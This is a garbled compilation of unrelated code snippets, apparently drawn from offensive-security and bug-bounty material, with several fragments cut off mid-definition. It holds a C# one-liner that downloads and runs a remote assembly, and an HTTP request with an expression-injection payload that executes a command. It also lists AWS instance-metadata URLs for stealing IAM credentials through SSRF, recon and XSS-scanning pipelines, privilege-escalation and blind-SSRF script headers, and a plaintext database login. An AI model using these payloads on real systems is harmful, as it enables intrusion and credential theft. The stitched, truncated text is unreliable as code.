- mysql: 14.14 Distrib 5.5.14
- host: 127.0.0.1
- port: 3306
- user: victim
- password: 56789
```cpp
//============================================================================
// Name : OctaneCrawler.cpp
// Author : Berlin Brown (berlin dot brown at gmail.com)
// Version :
// Copyright : Copyright Berlin Brown 2012-2013
// License : BSD
// Description : This is the simplest possible web crawler in C++
// Uses boost_regex and boost_algorithm
//============================================================================
```
```csharp
public class Program { public static void Main(string[] args) { System.Reflection.Assembly.Load(new System.Net.WebClient().DownloadData(args[0])).GetTypes()[0].GetMethods()[0].Invoke(0, null); } }
```
```python
#!/usr/env python
###############################################################################################################
## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script
## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift
##-------------------------------------------------------------------------------------------------------------
## [Details]:
## This script is intended to be executed locally on a Linux box to enumerate basic system info and
## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text
## passwords and applicable exploits.
```
```http
POST /users HTTP/1.1
Host: localhost:8080
Content-Type: application/x-www-form-urlencoded
Content-Length: 164

username[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec('xterm')")]=asdf
```
```python
#!/usr/bin/env python
# -*- coding utf-8 -*-
#
# Copyright 2016 Akshay Raj Gollahalli
import dns.resolver
def get_records(domain):
    """
```
```
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
```
```bash
function sslsub() {
  timeout 3 openssl s_client -showcerts -servername $1 -connect $1:443 <<< "Q" 2>/dev/null | openssl x509 -text -noout | grep DNS | tr ',' '\n' | cut -d ':' -f 2 | sort -fu
}
```
```bash
#cat targets_urls.txt
http://public-firing-range.appspot.com

gospider -S targets_urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe -o result.txt
```
```bash
echo "Blind SSRF testing - append to parameters and add new parameters @hussein98d"
echo "Usage: bash script.sh domain.com http://server-callbak"
echo "This script uses https://github.com/ffuf/ffuf, https://github.com/lc/gau, https://github.com/tomnomnom/waybackurls"
if [ -z "$1" ]; then
  echo >&2 "ERROR: Domain not set"
  exit 2
fi
if [ -z "$2" ]; then
  echo >&2 "ERROR: Sever link not set"
  exit 2
```